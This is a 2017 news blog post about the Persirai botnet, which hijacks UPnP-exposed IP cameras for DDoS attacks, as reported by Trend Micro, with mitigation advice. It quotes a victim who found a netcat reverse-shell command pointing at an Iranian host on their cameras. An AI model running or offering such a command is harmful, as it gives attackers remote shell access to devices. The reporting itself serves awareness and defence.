We’ve had WannaCry, but Persirai hijacks your IP cameras

Written by on May 15, 2017 in Guest Blog with 0 Comments

mozakim / Shutterstock.com

Trend Micro has discovered a new attack on internet-based IP cameras and recorders powered by a new Internet of Things (IOT) bot dubbed PERSIRAI.

A new Persirai Internet of Things (IoT) botnet has targeted over 1,000 different models of vulnerable IP cameras and is using the hijacked devices to carry out DDoS attacks.

Over 122,000 cameras from a variety of manufacturers are vulnerable to becoming part of the Persirai botnet – and the vast majority of owners don’t even know their devices are exposed on the internet and thus easily targeted by malware.

Discovered by cybersecurity researchers at Trend Micro, 122,069 of the affected IP cameras across the globe can easily be discovered via the Shodan IoT search engine – with vulnerable products visible in China and Japan, through Europe and all the way across to the Americas.

Trend Micro blog says “we detected approximately 120,000 IP cameras that are vulnerable to ELF_PERSIRAI.A via Shodan. Many of these vulnerable users are unaware that their IP Cameras are exposed to the internet.”

IP Cameras typically use Universal Plug and Play (UPnP), which are network protocols that allow devices to open a port on the router and act like a server, making them highly visible targets for IoT malware.

“C&C (Command and Control) servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.

IP Camera users have also encountered the malware attack and noted its point of origin appears to be Iran.

“Hello found the following text on my 2 ip cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an iranian address nothing on whois. Ive obviously been hacked one of these cameras was in the kids room,” stated one user in the Reddit hacking forum.

The attack is based on the previously successful Mirai IOT (here) strike against IP cameras that was used to disrupt the Internet with a giant Denial of Service (DOS) attack in 2016.  However, while over 120,000 IP camera systems appear to be infected, over 30% of the Persirai targets are inside China with only small fraction located outside of the PRC; in Italy (3%), the UK (3%) and the USA (8%).

The Persirai attack is disturbing on a number of fronts. It is based on the open-source Mirai strike shows that the freely available source code will be modified by attackers to strike again in different forms. It is also very stealthy, leaving most camera owners unaware that their systems are infected.

While Trend Micro advises IP Camera users to use strong passwords, the Persirai attack is not dependent on a password attack, nor does it appear to steal passwords. A better counter-measure is to disable Universal Plug and Play (UPnP) features on your router. Universal Plug and Play (UPnP) is a network protocol that allows devices such as IP Cameras to open a port on the router and act like a server. This feature also makes the attached devices highly visible targets for the Persirai malware attack.

More on Securityaffairs and Trendmicro.

This article was first published on CyberSec.Buzz.

Tags: , , ,

About the Author

About the Author: Jonathon has been lurking around the Telecoms and Internet space for the last 20 years. He is now a man on a mission – that being the reformation of the Industry Analyst business. He is working with his co-conspirators on transforming the Industry Analyst world forever as an Expert with EMI. .


If you enjoyed this article, subscribe now to receive more just like it.

Subscribe via RSS Feed

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: